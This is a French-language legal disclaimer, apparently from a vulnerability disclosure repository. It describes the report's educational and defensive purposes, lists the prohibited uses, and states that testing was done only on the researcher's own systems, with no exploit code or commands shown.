## Avis de non-responsabilité légal
Ce dépôt est fourni strictement à des fins éducatives, de recherche défensive en sécurité et de reproduction de vulnérabilités dans des environnements de laboratoire contrôlés.
Les informations et le code de preuve de concept sont destinés à aider les défenseurs, les chercheurs et les fournisseurs à comprendre et à corriger la vulnérabilité signalée.
Toute utilisation non autorisée ou malveillante de ce code contre des systèmes sans autorisation explicite peut enfreindre les lois et réglementations applicables.
L'auteur n'encourage ni ne cautionne les activités illégales et décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par ce matériel.

Ce rapport de divulgation de vulnérabilité est fourni pour :
1. La recherche et l'éducation en sécurité
2. La notification aux fournisseurs et le développement de correctifs
3. La protection des utilisateurs finaux
4. Des fins académiques et de sécurité défensive

**Utilisations interdites :**
- Accès non autorisé aux systèmes informatiques
- Exploitation malveillante
- Toute activité illégale

Le chercheur a effectué tous les tests sur des systèmes lui appartenant, dans des environnements contrôlés. Aucun accès non autorisé à des systèmes tiers n'a été effectué.

**Version du rapport :** 1.0  
**Dernière mise à jour :** 9 février 2026
Télécharger l’outil